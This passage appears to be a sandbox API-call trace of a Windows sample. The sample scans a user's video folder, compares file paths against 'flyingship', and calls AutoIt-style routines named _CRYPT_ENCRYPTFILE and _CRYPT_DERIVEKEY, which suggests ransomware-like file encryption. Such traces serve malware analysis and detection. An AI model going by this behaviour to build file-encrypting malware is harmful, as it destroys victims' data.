ftLastWriteTime.dwLowDateTime=0xae6eb000, ftLastWriteTime.dwHighDateTime=0x1d5dad0, nFileSizeHigh=0x0, nFileSizeLow=0x102c9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="c5JuP_Nf8XPMTRuN_.avi", cAlternateFileName="C5JUP_~1.AVI")) returned 0x90add8 [0196.949] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0196.949] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JuP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uP_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XPMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PMTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MTRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TRuN_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.951] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.951] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0196.951] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0196.951] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.951] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.951] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.951] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.951] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.952] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.952] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb14b600, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xae6eb000, ftLastAccessTime.dwHighDateTime=0x1d5dad0, ftLastWriteTime.dwLowDateTime=0xae6eb000, ftLastWriteTime.dwHighDateTime=0x1d5dad0, nFileSizeHigh=0x0, nFileSizeLow=0x102c9, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="c5JuP_Nf8XPMTRuN_.avi", cAlternateFileName="C5JUP_~1.AVI")) returned 0x90ae18 [0196.953] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0196.953] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.953] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0196.954] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.954] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.954] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0196.954] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.954] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0196.954] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.954] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0196.954] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.954] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.954] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.954] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.954] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0196.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.955] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0196.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.956] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0196.956] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.956] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.957] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0196.957] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.957] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.957] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.957] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.957] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.957] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.957] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0196.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.957] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0196.957] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.957] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.957] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0196.957] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.957] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0196.958] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.958] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.958] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.958] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.958] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.958] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.958] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.958] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.959] CharLowerBuffW (in: lpsz="bool", 